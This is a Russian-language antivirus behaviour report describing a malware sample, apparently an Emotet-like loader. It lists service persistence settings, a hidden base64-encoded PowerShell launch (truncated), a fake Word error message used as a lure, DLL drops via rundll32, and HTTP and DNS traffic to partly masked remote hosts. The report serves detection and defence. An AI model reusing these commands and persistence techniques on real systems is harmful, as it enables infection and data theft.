Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\umtlq.ybh] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\umtlq.ybh] 'ImagePath' = '%WINDIR%\SysWOW64\rundll32.exe "%WINDIR%\SysWOW64\Mwbl\umtlq.ybh",RunDLL'
Создает следующие сервисы
- 'umtlq.ybh' %WINDIR%\SysWOW64\rundll32.exe "%WINDIR%\SysWOW64\Mwbl\umtlq.ybh",RunDLL
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD IABTAHYAIAAgACgAIgBHACIAKwAiAHMAegAiACkAIAAoAFsAdABZAFAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQB7ADMAfQAiACAALQBmACAAJwBTACcALAAnAC4AaQAnACwAJwB5AFMAVABlAE0A...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\nyksa9d\u5phcqv\rg2dfef7.dll
Удаляет следующие файлы
- %WINDIR%\syswow64\mwbl\umtlq.ybh
Перемещает следующие файлы
- %HOMEPATH%\nyksa9d\u5phcqv\rg2dfef7.dll в %WINDIR%\syswow64\mwbl\umtlq.ybh
Сетевая активность
Подключается к
- '17#.#93.14.201':80
TCP
Запросы HTTP GET
- http://vi####nsen.com.br/loja_old_1/System32/
Запросы HTTP POST
- http://17#.#93.14.201/w4hh99pjmi/onkabtpzgtwwkwzg/ngpd0f/
UDP
- DNS ASK th######gtrungnienkim.vn
- DNS ASK pe###sbar.co.il
- DNS ASK vi####nsen.com.br
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IABTAHYAIAAgACgAIgBHACIAKwAiAHMAegAiACkAIAAoAFsAdABZAFAAZQBdAC...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Nyksa9d\U5phcqv\Rg2dfef7.dll #1
- '%WINDIR%\syswow64\rundll32.exe' "%WINDIR%\SysWOW64\Mwbl\umtlq.ybh",RunDLL
